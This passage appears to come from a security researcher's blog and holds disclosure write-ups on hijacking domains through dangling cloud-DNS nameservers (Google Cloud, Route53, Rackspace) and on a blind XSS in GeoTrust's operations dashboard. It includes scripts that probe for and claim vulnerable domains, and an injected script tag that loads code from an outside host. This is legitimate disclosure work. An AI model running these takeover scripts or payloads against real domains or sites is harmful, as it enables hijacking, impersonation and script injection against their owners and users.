The last step is what is causing dig to return this SERVFAIL error, so we’ll skip it and just ask the nameservers for the .net TLD directly. First we’ll query what those are:

ubuntu@ip-172-30-0-49:~$ dig NS net.

; <<>> DiG 9.9.5-3ubuntu0.8-Ubuntu <<>> NS net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 624
;; flags: qr rd ra; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;net.                           IN      NS

;; ANSWER SECTION:
net.                    2597    IN      NS      b.gtld-servers.net.
net.                    2597    IN      NS      c.gtld-servers.net.
net.                    2597    IN      NS      d.gtld-servers.net.
net.                    2597    IN      NS      e.gtld-servers.net.
net.                    2597    IN      NS      f.gtld-servers.net.
net.                    2597    IN      NS      g.gtld-servers.net.
net.                    2597    IN      NS      h.gtld-servers.net.
net.                    2597    IN      NS      i.gtld-servers.net.
net.                    2597    IN      NS      j.gtld-servers.net.
net.                    2597    IN      NS      k.gtld-servers.net.
net.                    2597    IN      NS      l.gtld-servers.net.
net.                    2597    IN      NS      m.gtld-servers.net.
net.                    2597    IN      NS      a.gtld-servers.net.

;; Query time: 7 msec
;; SERVER: 172.30.0.2#53(172.30.0.2)
;; WHEN: Sat Sep 17 16:53:54 PDT 2016
;; MSG SIZE  rcvd: 253

Now we can query one of these nameservers for the nameservers of our target domain:

ubuntu@ip-172-30-0-49:~$ dig NS zz[REDACTED].net @a.gtld-servers.net.

; <<>> DiG 9.9.5-3ubuntu0.8-Ubuntu <<>> NS zz[REDACTED].net @a.gtld-servers.net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3529
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;zz[REDACTED].net.                 IN      NS

;; AUTHORITY SECTION:
zz[REDACTED].net.          172800  IN      NS      dns1.stabletransit.com.
zz[REDACTED].net.          172800  IN      NS      dns2.stabletransit.com.

;; ADDITIONAL SECTION:
dns1.stabletransit.com. 172800  IN      A       69.20.95.4
dns2.stabletransit.com. 172800  IN      A       65.61.188.4

;; Query time: 9 msec
;; SERVER: 192.5.6.30#53(192.5.6.30)
;; WHEN: Sat Sep 17 16:54:48 PDT 2016
;; MSG SIZE  rcvd: 129

Now we can see that the nameservers for this domain are dns1.stabletransit.com and dns2.stabletransit.com and can target this set of nameservers specifically.

In order to find a list of domains vulnerable to this issue I used my copies of the zone files for the .com and .net TLDs, which are available via Verisign (you have to apply to get access). These zone files contain every .com and .net domain name along with the nameservers they use. Using this data we can find all domains which are hosted by a specific cloud provider, because their nameservers will be those of that provider. Once we have a list for a specific provider we can use a small Python script to query each domain and probe for the SERVFAIL or REFUSED DNS errors. Finally, we use the cloud management panel to see if we can add these domains to our account, confirming that the vulnerability exists.
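
A rough sketch of that probing step (assuming dnspython 2.x; the provider nameserver and candidate list below are placeholders) looks something like this:

# A sketch of the probing step described above (assumes dnspython 2.x). For
# each candidate domain we ask one of the provider's own nameservers for the
# domain's NS records; SERVFAIL or REFUSED suggests the provider is delegated
# for the domain but no account holds a zone for it - i.e. likely vulnerable.
import dns.exception
import dns.message
import dns.query
import dns.rcode
import dns.rdatatype
import dns.resolver

PROVIDER_NAMESERVER = "dns1.stabletransit.com."  # example from the output above
candidates = ["zz-redacted-example.net"]         # domains pulled from the zone file

provider_ip = next(iter(dns.resolver.resolve(PROVIDER_NAMESERVER, "A"))).address

for domain in candidates:
    query = dns.message.make_query(domain, dns.rdatatype.NS)
    try:
        response = dns.query.udp(query, provider_ip, timeout=5)
    except dns.exception.Timeout:
        continue
    rcode_text = dns.rcode.to_text(response.rcode())
    if response.rcode() in (dns.rcode.SERVFAIL, dns.rcode.REFUSED):
        print(f"[!] {domain} looks vulnerable ({rcode_text})")
    else:
        print(f"[-] {domain} returned {rcode_text}")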

Google Cloud DNS (~2.5K Domains Affected, Patched)

Google’s Cloud offering includes a managed DNS service line which has an easy import process for new domains. Documentation for doing so can be found here. The general process is the following (a scripted sketch of the same loop appears after the list):

  • Go to the DNS management panel of your Google Cloud account: https://console.cloud.google.com/networking/dns
  • Click the “+ Create Zone” button.
  • Create a new zone with any name and a “DNS Name” of the vulnerable domain.
  • Click the “Create” button to create this new zone.
  • Note the list of nameservers that have been returned to you. In this example I received the following: [screenshot: google-cloud-returned-nameservers]
  • Check if the nameservers match the target nameservers; if they don’t, just delete the zone and try again.
  • Once you’ve finally gotten a matching list of nameservers you now have full control of the DNS for that domain.
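
A rough sketch of automating that loop follows, assuming the google-cloud-dns Python client library behaves as described in its documentation (zone()/create()/delete() and a name_servers property); the project, domain, and target nameserver set are placeholders:

# A sketch of the create/check/delete loop above. Assumes the google-cloud-dns
# client library ("pip install google-cloud-dns") and a project you control;
# all names below are placeholders.
import uuid
from google.cloud import dns

TARGET_NAMESERVERS = {"ns-cloud-e1.googledomains.com."}  # hypothetical target set
client = dns.Client(project="my-example-project")

while True:
    zone = client.zone(f"poc-{uuid.uuid4().hex[:12]}", "vulnerable-example.com.")
    zone.create()
    # name_servers should be populated from the API response to create().
    returned = set(zone.name_servers or [])
    if returned & TARGET_NAMESERVERS:
        print(f"Got a matching nameserver set: {sorted(returned)}")
        break  # keep this zone - it now answers for the vulnerable domain
    zone.delete()  # no overlap with the target's delegation, try again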

Disclosure & Remediation Timeline

  • Sep 9, 2016: Reported issue to Google bug bounty program, provided a list of vulnerable domains as well.
  • Sep 9, 2016: Report triaged by Google Security Team.
  • Sep 9, 2016: Vulnerability confirmed, internal bug filed for the issue.
  • Sep 13, 2016: Reward of $1,337 awarded, donation matching available if given to a charity.
  • Sep 14, 2016: Requested the reward be given to the Tor Project (making the donation $2,674). Received a Tor hoodie/swag :) from the Tor folks – thanks guys/gals!

Amazon Web Services – Route53 (~54K Domains Affected, Multiple Mitigations Performed)

Amazon’s managed DNS service line is called Route53. They have a number of nameservers which they randomly return to you, distributed across multiple domains and TLDs. Previously I thought this was to defend against this specific type of vulnerability; however, since they are vulnerable, I believe this was done more to ensure uptime in case a TLD experiences DNS issues.

The zone creation process for Route53 is complicated by the fact that they have a wide range of nameservers which can be returned to you. However, the following process allows you to take over a target domain in just a few minutes. In order to automate this process I wrote a small Python proof-of-concept script which would create and delete Route53 zones until the proper nameservers were returned (a rough sketch of this loop appears below). One unique property of this vulnerability for Route53 was that you could get just one of the target’s nameservers returned to you instead of all four in a set, as with other managed DNS providers. This turns out to be just fine from an exploitation standpoint, because you can simply keep the zone with three incorrect nameservers and one correct nameserver and keep creating zones until you have a couple of zones with just one target nameserver in each. Then you can replicate your DNS records across these four zones to set DNS for the target.

The process for this is as follows:

  • Use the AWS Route53 API to create a new zone for a target domain.
  • Check the resulting nameservers that were returned for this zone; if any of them match the target’s nameservers, keep the zone and remove the matched nameserver from the list of targeted nameservers. The following is an example of the nameservers returned for a domain:

[Screenshot: nameservers returned by Route53 for a newly created zone]

  • If none are shared with the target nameserver set, delete the zone.
  • Keep repeating this process until you have X number of zones which have all of the target’s vulnerable nameservers.
  • Now just create the DNS record you’d like for the target domain across all zones.

The following is a redacted example of creating four zones for a target domain, each zone containing just one of the target’s nameservers:

[Screenshot: four Route53 zones for the target domain, each containing one of the target’s nameservers]

Using this method we can reliably take over any of these 54K domains.
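
That proof-of-concept script isn’t reproduced here, but a minimal sketch of the same zone-churning approach using boto3 would look roughly like this (the domain and target nameserver set below are placeholders):

# A minimal boto3 sketch of the Route53 zone-churning approach described
# above: keep any zone whose delegation set shares a nameserver with the
# target's delegation, delete the rest, and repeat until every target
# nameserver is covered. Domain and target set below are placeholders.
import uuid
import boto3

route53 = boto3.client("route53")
target_ns = {
    "ns-1234.awsdns-12.org",  # hypothetical nameservers still delegated to
    "ns-567.awsdns-34.net",   # the vulnerable (zone-less) target domain
}
kept_zones = []

while target_ns:
    zone = route53.create_hosted_zone(
        Name="vulnerable-example.com",
        CallerReference=str(uuid.uuid4()),
    )
    returned = {ns.rstrip(".") for ns in zone["DelegationSet"]["NameServers"]}
    matched = {ns for ns in target_ns if ns.rstrip(".") in returned}
    if matched:
        kept_zones.append(zone["HostedZone"]["Id"])
        target_ns -= matched      # one more target nameserver covered
    else:
        route53.delete_hosted_zone(Id=zone["HostedZone"]["Id"])

print(f"Kept {len(kept_zones)} zones covering all target nameservers: {kept_zones}")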

Disclosure & Remediation Timeline

  • Sep 5, 2016: Contacted AWS security using PGP describing the full scope of the issue and with an attached list of vulnerable domains.
  • Sep 5, 2016: (less than an hour from first contact): Response from AWS stating they will investigate immediately and follow up as soon as they know more.
  • Sep 5, 2016: Responded to the team with an apology for contacting them on Labor Day and thanking them for the quick response time.
  • Sep 7, 2016: Contacted by Zack from the AWS security team, requesting a call to talk more about the issue and understand a disclosure strategy.
  • Sep 7, 2016: Responded confirming that Sep 8 works for a call to discuss.
  • Sep 8, 2016: Call with AWS to discuss the vulnerability and plans to alert affected customers and remediation of the issue.
  • Oct 7, 2016: Follow-up call with someone from the Route53 team discussing Amazon’s remediation strategy and next steps. Their plan was three-pronged in approach:

All of the above steps were indeed taken by Amazon. You now get the following warning when you delete a zone in Route53:

[Screenshot: the warning Route53 now shows when deleting a hosted zone]

If you are an AWS customer using Route53, be sure to read this documentation about the risks of not changing your domain nameservers after deleting a zone from your account.

Disclosure notes: Overall this team was awesome to do disclosure with; they were super helpful and cared deeply about getting a proper fix in place. The response in less than an hour on Labor Day (late at night, too) was crazy to see; very impressed. Great job guys :), I wish all disclosures were like this.

Rackspace (~44K Domains Affected, Won’t Fix)

Rackspace offers a Cloud DNS service which is included free with every Rackspace account. Unlike Google Cloud and AWS Route53, there are only two nameservers (dns1.stabletransit.com and dns2.stabletransit.com) for their cloud DNS offering, so no complicated zone creation/deletion process is needed. All that needs to be done is to enumerate the vulnerable domains and add them to your account. The steps for this are the following:

  • Under the Cloud DNS panel, click the “Create Domain” button and specify the vulnerable domain and a contact email and TTL.
  • Now simply create whatever DNS records you’d like for the taken-over domain.

This can be done for any of the 44K domain names to take them over. Rackspace does not appear to be interested in patching this (see below), so if you are a Rackspace customer please ensure you properly remove Rackspace’s nameservers from your domain after you migrate away.

Disclosure & Remediation Timeline

  • Sep 9, 2016: Reported vulnerability to the Rackspace security team, included a list of vulnerable domains.
  • Sep 12, 2016: Rackspace responds with the following:

    “Thank you for your submission. We have taken it under advisement and will contact you if we require any additional information. For the protection of our customers, Rackspace does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches, fixes, or releases are available. Rackspace usually distributes security disclosures and notifications through blog posts and customer support portals.

    Please do not post or share any information about a potential security vulnerability in any public setting until we have researched, responded to, and addressed the reported vulnerability and informed customers, if needed. Our products are complex, and reported security vulnerabilities will take time to investigate, address, and fix.

    While we sincerely appreciate reports for vulnerabilities of all severity levels, we will include your name on our website at http://www.rackspace.com/information/legal/rsdp if you report a previously unknown vulnerability, which Rackspace has determined to be of a high or critical severity, or in cases where there has been continued research or other contributions made by the person.

    Thanks and have a great day.”

  • Sep 14, 2016: Due to the previous email seeming to state that they won’t confirm the issue until a full investigation occurs, I asked that they notify me when remediation has occurred so I can properly coordinate releasing the vulnerability information to the general public.
  • Oct 7, 2016: Due to a lack of response from vendor, notified them that a 90-day responsible disclosure timeline would be observed with a disclosure occurring regardless of a patch.
  • Nov 7, 2016: Pinged Rackspace (no response as of yet) notifying them that disclosure will occur in 30 days.
  • Dec 5, 2016: Received the following response from Rackspace:

    “Thank you again for your work to raise public awareness of this DNS issue. We’ve been aware of the issue for quite a while. It can affect customers who don’t take standard security precautions when they migrate their domains, whether those customers are hosted at Rackspace or at other cloud providers.

     

    If a customer intends to migrate a domain to Rackspace or any other cloud provider, he or she needs to accomplish that migration before pointing a domain registrar at that provider’s name servers. Otherwise, any customer of that provider who has malicious intentions could conceivably add that domain to his or her account. That could allow the bad actor to effectively impersonate the domain owner, with power to set up a website and receive email for the hijacked domain.

     

    We share multiple articles about DNS both on the Rackspace Support Network (https://support.rackspace.com/) and in the Rackspace Community (https://community.rackspace.com/). Our Acceptable Use Policy (http://www.rackspace.com/information/legal/aup) prohibits activities like this. Our support teams also work directly with customers to help them take the simple steps necessary to secure their domains.

     

    We appreciate your raising public awareness of this issue and are always glad to work with you.

     

    Sincerely,

    The Rackspace DNS Team”

Disclosure notes: Responsible disclosures that affect a large number of vendors usually take a full 90 days because one vendor drags their feet until the very end. In this case it appears Rackspace is that vendor. Their policy, specifically the following: “Rackspace does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches, fixes, or releases are available.” does not instill confidence that anything is being done to address reported security vulnerabilities. Refusing to confirm or discuss a reported security vulnerability until after remediation is a very odd approach, and it’s unclear why such a policy would ever be in place. One would hope that all of the initial reports they receive are 100% clear in explanation, since they cannot ask any questions until after remediation of said unclear vulnerability has occurred. Additionally, the final response seems to be to the effect of “we write many articles about DNS; also, if a customer doesn’t properly remediate this issue they will be vulnerable, but it is against our AUP to exploit it”. So this puts extra importance on raising awareness of this issue, since Rackspace does not appear interested in issuing a fix.

DigitalOcean (~20K Domains Affected)

For the full write up on how this issue affected Digital Ocean, please see this post.

Remediation Recommendation

Different cloud providers took different approaches to this issue. My recommendation for remediation is fairly straightforward and is the following:

  • User adds the domain to their account via the cloud management panel.
  • At this time the cloud provider returns a random list of nameservers for the domain owner to point their domain to. For example:
    • a-nameserver-one.example.com
    • a-nameserver-two.example.com
    • a-nameserver-three.example.com
  • The cloud provider now continually queries the TLD’s nameservers for the list of nameservers that the domain has been set to. Once the user has set their nameservers properly the cloud provider stores the list of nameservers and the domain in a database.
  • For any future zones created for this domain the cloud provider will only return nameservers which do not match the stored list of nameservers. This means that in order to use a newly created zone the domain owner will have to set their domain’s nameservers to a new nameserver set, ensuring that only the domain owner can actually carry out this action.
  • The cloud provider will continually query the TLD nameservers to see if the domain’s nameservers have changed to the new set and will store the results in a database as we did in step 3.

The above method does add a bit of friction to the process of re-creating a zone for a domain, but it completely prevents this issue from occurring. Since the friction is only equivalent to the initial domain import process it doesn’t seem too unreasonable, but it is possible that providers won’t want to inconvenience customers this way.
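
A minimal sketch of the delegation check at the heart of this recommendation, assuming dnspython 2.x (the TLD server, domain, and nameserver pool below are placeholders):

# A sketch of the verification step from the recommendation above (assumes
# dnspython 2.x). The provider asks the TLD's own nameservers which
# nameservers a domain is really delegated to, stores that verified set, and
# refuses to hand a new zone any nameserver pool that overlaps it.
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver

def delegated_nameservers(domain, tld_server="a.gtld-servers.net."):
    """Ask the TLD directly (not a recursive resolver) for the domain's NS set."""
    tld_ip = next(iter(dns.resolver.resolve(tld_server, "A"))).address
    query = dns.message.make_query(domain, dns.rdatatype.NS)
    response = dns.query.udp(query, tld_ip, timeout=5)
    return {item.target.to_text().lower()
            for rrset in (response.authority or response.answer)
            if rrset.rdtype == dns.rdatatype.NS
            for item in rrset}

def nameservers_for_new_zone(verified, pools):
    """Only hand out a nameserver pool that does not overlap the verified set."""
    for pool in pools:
        if not (set(pool) & verified):
            return pool
    raise RuntimeError("no unused nameserver pool available")

verified = delegated_nameservers("example.net.")
print(nameservers_for_new_zone(
    verified, pools=[["a-nameserver-one.example.com.", "a-nameserver-two.example.com."]]))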

Usefulness to Attackers

The attack scenario for this vulnerability can be split into two separate groups, targeted and un-targeted. Depending on the end goal of an attacker, either one could be chosen.

Targeted Attack

In the targeted use case you have an attacker who wants to take over a specific domain or list of domains belonging to their victim. In this case an attacker would set up a script to continually perform NS queries against the nameservers of the domains that they are targeting. The script will detect if it has received a SERVFAIL or REFUSED DNS error and, upon detecting that no zone exists for the domain, will immediately attempt to allocate the target’s nameservers. Many different mistakes on the domain owner’s part could cause the zone to be deleted, such as the cloud provider deleting the zone due to lack of payment, or the company changing providers, etc.

Un-Targeted Attack

The more likely attack scenario, in my opinion, would be an attacker who is merely interested in clean domains to be used for malware and spam related campaigns. Since many threat intelligence services will rate a domain based on its age, length of registration, and cost to register, there is a big advantage to hijacking existing domains over registering new ones. In addition to the hijacked domains often having a past history and a long age, they also have WHOIS information which points to real people unrelated to the person carrying out the attack. If an attacker launches a malware campaign using these domains, it will be harder to pinpoint who or what is carrying out the attack, since the domains would all appear to be just regular domains with no observable pattern other than the fact that they all use cloud DNS. It’s an attacker’s dream: troublesome attribution and an endless number of names to use for malicious campaigns.

Conclusion

This vulnerability is a systemic issue which affects all major managed DNS providers. It is very likely that more providers which are not mentioned here are affected as well. All managed DNS providers are encouraged to check their own implementations for this issue and to patch and notify customers as soon as possible.

Until next time,

-mandatory


This is a continuation of a series of blog posts covering blind cross-site scripting (XSS) and its impact on the internal systems which suffer from it. Previously, we’ve shown that data entered into one part of a website, such as the account information panel, can lead to XSS on internal account-management panels. This was the case with GoDaddy, the Internet’s largest registrar. Today we will be showing off a vulnerability in one of the Internet’s certificate authorities which gives us a rare peek inside their internals.

One of the Best Disclosure Experiences in a Long Time

Before we start I would like to call out the awesome responsible disclosure experience I had with Symantec (the owner of GeoTrust). To be honest I had incredibly low expectations before I contacted them, but the person I talked with (Mike) was super helpful and made the experience completely painless. They had no problem using PGP, kept me updated with the status of the bug, and gave me a tracking ID for the vulnerability – all signs of a mature disclosure program. Finally, they even took action to ensure that the entire code base was scrubbed for other XSS vulnerabilities, which actually took me aback with its level of proactiveness. While the security community seems to hate vendors if they don’t reward $50,000 for every security issue, I still really appreciate companies working with researchers even if no reward is involved. The security advisory for this vulnerability has also been posted to their website and can be found here.

What is a Certificate Authority?

For those unfamiliar with the inner workings of SSL/TLS, the entire system is based on trusting a handful of certificate authorities (CAs). These certificate authorities have the power to mint intermediate certificate authorities, which can then mint certificates for websites looking to protect their communications with SSL/TLS. All of these certificate authorities are embedded in your web browser by default, which gives them this power. This system means that certificate authorities can sell this service, as is the case with GeoTrust, or offer it for free, as is the case with Let’s Encrypt. In order for an attacker to intercept communications to these websites, they must have access to a trusted CA, or an intermediary CA created by a trusted CA, which is already embedded in the user’s browser. Mozilla, the creator of the Firefox web browser, keeps a simple list of the certificate authorities that are trusted in Firefox by default here. One of the important responsibilities of certificate authorities is to ensure that only the true owners of websites are allowed to issue certificates for them. This is to ensure that malicious actors don’t get a valid certificate for a website that they do not own (such as google.com, etc.). If a certificate authority fails to carry out this duty properly, it risks being removed from all modern web browsers. This was the case with the certificate authority DigiNotar, which was breached and used to issue improper SSL/TLS certificates for Gmail, allowing the Iranian government to spy on its citizens. Browser vendors reacted by removing DigiNotar from their trust stores, meaning that all certificates issued by this certificate authority were no longer trusted and would throw an SSL error when used. In the end, this led to the Dutch government taking over the company and, ultimately, bankruptcy for DigiNotar.

Discovering the Vulnerable GeoTrust Operations Dashboard

Originally, I wasn’t looking for a vulnerability in GeoTrust at all; I simply wanted to obtain a trusted SSL/TLS certificate with my XSS Hunter payloads in some of the certificate fields using various certificate authorities. This was an attempt to enumerate vulnerabilities in systems which scan the Internet for these certificates and index them. However, during my testing I found an unintended vulnerability in GeoTrust’s Operations Panel when a support agent viewed my certificate request information. I woke up one morning with an XSS Hunter payload fire email titled [XSSHunter] XSS Payload Fired On https://ops.geotrust.com/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp in my inbox with the following screenshot attached:

[Redacted screenshot of the GeoTrust Operations Dashboard payload fire]

The above screenshot is partially redacted to respect the privacy of the customers of GeoTrust (and the agent viewing the page). However, the red highlighted portion shows the location of the XSS payload which had fired.

In the above screenshot there appears to be a “Vetting” portion to this operations panel. Likely this is for manual “vetting” of those requesting certificates. I’ll leave the possible security implications of this up to the reader. However, I was not able to verify its purpose since I didn’t want to overstep my boundaries in any way.

So what code made this page vulnerable? Let’s take a closer look.

Better Context, Better Understanding

Since our XSS Hunter probe collects the vulnerable page’s DOM, we can investigate the page’s JavaScript source code to attempt to discover the cause of this vulnerability. In this case the vulnerability appeared to stem from a function named getOrders. The code for this function is the following:

function getOrders() {

    // get the form values
    var dateInput = $('#date2').datepicker( "getDate" );
    var range1 = $('#from').datepicker( "getDate" );
    var range2 = $('#to').datepicker( "getDate" );

    dateInput = $.datepicker.formatDate('@', dateInput);
    range1 = $.datepicker.formatDate('@', range1);
    range2 = $.datepicker.formatDate('@', range2);

    var curr = new Date();

    if((curr - range2) < 86400000){
           alert("Cannot cancel orders less than 21 days old")
    }else{

        if($('input[name=searchRadio]:checked').val() == "byDate"){
                range1 = 0;
                range2 = dateInput;
        }

        range1 = range1.toString();
        range2 = range2.toString();

        $.ajax({
            type: "GET",
            dataType: "json",
            url: "/opsdashboard/CancelAgedOrdersServlet",
            data: "range1=" + range1 + "&range2=" + range2 + "&cancel=false",
            success: function(data, textStatus, XMLHttpRequest){
                var table = "<table border=\"1\" cellpadding=\"3\" cellspacing=\"0\" align=\"center\"><tr><td bgcolor=\"pink\">" +
                                "Order ID</td><td bgcolor=\"pink\">Product Name</td><td bgcolor=\"pink\">Customer Name" +
                                "</td><td bgcolor=\"pink\">Order Date</td><td bgcolor=\"pink\">Order State</td></tr>";
                var count = data.length;
                var i;
                if(count==0){
                    alert('No orders to retrieve');
                     $('#getOrdersDiv').show();
                }
                else if(count==1 && data[0].RecordsOverflow == "true"){
                    alert('Too many records retrieved, please reduce date range.');
                     $('#getOrdersDiv').show();
               }
                else{
                for(i = 0; i < count; i++){
                    table = table + "<tr><td>" + data[i].ID + "</td><td>" + data[i].Product +
                    "</td><td>" + data[i].Customer + "</td><td>" + (data[i]).Date +
                    "</td><td>" + data[i].State + "</td></tr>";
                }

                table = table + "</table>";
                $('#grid').html(table);
                $('#grid').show();
                $('#cancels').show();
            }

            },
            error: function(XMLHttpRequest, textStatus, errorThrown){
                alert('No orders to retrieve');
                $('#getOrdersDiv').show();
            }
        });
    }
}

The above code shows that the HTML table seen in the screenshot is created by concatenating HTML with order information retrieved from a JSON endpoint /opsdashboard/CancelAgedOrdersServlet. The relevant lines are the following:

for(i = 0; i < count; i++){
    table = table + "<tr><td>" + data[i].ID + "</td><td>" + data[i].Product +
    "</td><td>" + data[i].Customer + "</td><td>" + (data[i]).Date +
    "</td><td>" + data[i].State + "</td></tr>";
}

The order ID, product name, customer name, order date, and order state are all concatenated directly into each row of the HTML table. When going through the free-trial certificate sign-up process, the customer name I provided was the following:

"><script src=https://y.vg></script>

Once the JavaScript code runs on my input, it creates a row with the following HTML:

<tr><td>13785664</td><td>GeoTrust SSL Trial</td><td>"><script src="https://y.vg"></script</td><td>06/06/2016 05:40:04</td><td>Waiting for Whois Approval</td></tr>

Finally, the entire HTML blob is inserted into the DOM with the following line:

$('#grid').html(table);

This causes the injected <script> tag to be written into the page and executed, which is what fired our XSS Hunter payload.

String concatenation is one of the most common ways for XSS vulnerabilities to occur and this is no exception. The important thing to note in this example is that we are able to determine the root cause of the vulnerability with ease due to the amount of contextual information collected by our XSS Hunter payloads. This makes communicating the root issue much easier and has, in the past, even led to vendors becoming concerned that I had actually logged in as an internal agent (though not in this specific case). In the world of blind payload testing, context is everything. You may only trigger the vulnerability a single time, so you must have as much information as possible if you want to get it fixed.
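
As an aside, the general fix for this class of bug is to HTML-encode untrusted values before concatenating them into markup (or to skip string concatenation entirely and build DOM nodes directly). The following is a minimal sketch of the encoding idea, shown in Python purely for illustration with the payload from above; any real fix would of course live in the dashboard’s own JavaScript or server-side code:

import html

# The customer name submitted during the free-trial sign-up (see above).
customer_name = '"><script src=https://y.vg></script>'

# Concatenating the raw value reproduces the vulnerable table cell.
vulnerable_cell = "<td>" + customer_name + "</td>"

# Encoding the value first renders the payload inert.
safe_cell = "<td>" + html.escape(customer_name, quote=True) + "</td>"

print(vulnerable_cell)  # <td>"><script src=https://y.vg></script></td>
print(safe_cell)        # <td>&quot;&gt;&lt;script src=https://y.vg&gt;&lt;/script&gt;</td>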

Exploitation During Remediation

Shortly after discovering this vulnerability I reached out to the Symantec security team to disclose it. After a quick exchange of PGP keys, the team received the vulnerability report, confirmed they understood the issue, and told me they would work on getting in contact with the appropriate product team.

A few days after this had occurred I woke up to yet another payload fire email; this time the title was the following:

[XSSHunter] XSS Payload Fired On https://stage1-ops.geotrust.symclab.net/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp

Attached was the following screenshot:

symantec_staging_xss_payload_fire

The above screenshot requires less redaction because it is a staging instance filled with test data. Apparently the product team that received the vulnerability report decided to use the same payload in staging as in production. Over the following days I received a few more payload fires from the same IP addresses:

[XSSHunter] XSS Payload Fired On file:///C:/Users/sachin_[REDACTED_LAST_NAME]/Desktop/iFrame.html

[XSSHunter] XSS Payload Fired On https://ft1-ops.geotrust.symclab.net/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp

Humorously, the first email had the following screenshot attached to it:

symantec_desktop_fire

The DOM contents were the following:

<html><head></head><body><header>Hello</header>
 
<iframe src="https://stage2-products.geotrust.symclab.net/orders/rapidssl.do?ref=454848RAP60985"></iframe>
 
`">` (S `"><table title="Click to Verify - This site chose Symantec SSL for secure e-commerce and confidential communications." border="0" cellpadding="2" cellspacing="0" width="135">
<tbody><tr>
<script>alert(1)</script><script src="https://y.vg"></script>
</tr></tbody></table>
</body></html>

It appeared one of the product team members was attempting to analyse the payload. The “Hello” made me wish I could’ve sent a response. So if you’re Sachin and you’re reading this post…hi! After receiving a few of these payload fires I reached back out to Symantec to let them know that the product team was testing with my payload. They communicated this to the team and I stopped receiving them shortly after.

The above occurrence points out another interesting angle of using blind cross-site scripting payloads. Since you are alerted to all payload fires, an attacker can not only learn about the XSS vulnerabilities themselves but also tell when someone is investigating the payload. This gives the attacker advance warning that someone is looking into their activities.

In addition to early warning, it shows that a developer’s first instincts can also be quite dangerous. The User-Agent of the developer who opened a local HTML file indicated that he was using Firefox 46 on Windows 7. The browser being used is important because file:// URIs are treated very differently depending on which browser is in use. Firefox, for example, allows you to use XMLHttpRequest to retrieve files which are in the same directory or lower on the file system. This means that, had I been malicious, I could have written a payload to enumerate and send me files off of the developer’s hard drive (assuming they were in the same or a lower directory as the fired .html payload file). Since this file was opened from the developer’s Desktop, the payload could’ve stolen everything else located there as well (what do you have on your desktop?). What started out as an XSS vulnerability in a website has now become a vulnerability which can exfiltrate files from a developer’s computer.

Final Thoughts

From this case study we’ve learned a lot about the precarious nature of blind XSS testing. If you are interested in testing for these types of vulnerabilities yourself, you can sign up for an account on the XSS Hunter website. If you don’t trust me or want to run your own version, you can get a copy of the source code on GitHub.

Disclosure Timeline

  • July 7th: XSS payload fire email received indicating the GeoTrust Operations Panel was vulnerable.
  • July 7th: Email sent to [email protected] – bounce message received.
  • July 7th: Sent vulnerability report to [email protected] instead after discovering Symantec owns GeoTrust.
  • July 8th: Received response from Mike at Symantec with a PGP key for encrypting the vulnerability details.
  • July 8th: Responded with PGP-encrypted vulnerability report.
  • July 8th: Vulnerability is confirmed by Mike and he states that he will reach out to the relevant team to get it fixed.
  • July 14th: Reached back out to Symantec to alert them that the product team is using the https://y.vg payload in staging testing.
  • July 15th: Mike from Symantec states he’ll follow up with the team about it, provides the tracking ID of SSG16-042 for the vulnerability.
  • August 31st: Symantec posts advisory on their website; it’s likely that a fix happened long before this point but extra time was taken to check the rest of the panel for further vulnerabilities.

crashed_ship

The above image is from here and was taken by Steve Jurvetson.

EDIT: DigitalOcean seems to be getting a lot of flak from this post so I’d just like to point out that I feel DigitalOcean’s reaction in this case was entirely justified (they saw an anomaly and they put a stop to it). The only thing I wish had been done differently is that the domains had been deleted from my account upon my being banned. There was a few-hour delay between testing and reaching out to them, and ideally I should’ve reached out ahead of time. The main reason I did not reach out with the theory instead of the proof-of-concept was that I believed it would be ignored due to lack of evidence (as has been my experience with past disclosures). Overall my impression of DigitalOcean’s security team is very positive and I will definitely be much more proactive about reaching out to them in the future.

DigitalOcean is a cloud service provider similar to Amazon Web Services or Google Cloud. They offer cloud DNS hosting as one of their product lines – a nice guide on how to set up your domain to use their DNS can be found here. Take a moment to read it over and see if you can spot any potential issues with their domain name setup process.

From a quick glance it appears to be a very easy-to-use system. For example: no pesky domain validation to impede your ability to add any arbitrary domain to your account, no need to recall who is on your domain’s WHOIS, and no need to point your domain at specific nameservers as is required with systems such as Cloudflare. In fact, all you have to do is the following:

“Within the Networking section, click on Add Domain, and fill in the the domain name field and IP address of the server you want to connect it to on the subsequent page.”

So, if you’d like, you can add my domain thehackerblog.com to your own DigitalOcean account right now (assuming nobody else has done so already). This brings up interesting questions like, “can people block me from importing my domain to DigitalOcean?” and, “what happens when I delete my domain from DigitalOcean but forget to change the nameservers?“. These are good questions, but before we answer them we’ll take a short detour to another cloud provider and see how their implementation differs.

The Route53 Set Up Process

Amazon Web Services, or AWS, also offers cloud DNS hosting in the form of its product line known as Route53. As a test, we’ll try the set up process for the domain thehackerblog.com. You can see AWS’s official documentation here if you’d like to try this yourself. The first step is to click the Create Hosted Zone button in the top left corner of the Route53 control panel. We’ll now fill in the domain we wish to use along with a short comment and whether or not we wish for this DNS zone to be public. Finally we hit create and are brought to the DNS management panel for our newly created zone. The NS record type has been pre-populated with a few randomly generated nameservers. For example, the nameserver list I received after trying this is as follows:

ns-624.awsdns-14.net.

ns-39.awsdns-04.com.

ns-1651.awsdns-14.co.uk.

ns-1067.awsdns-05.org.

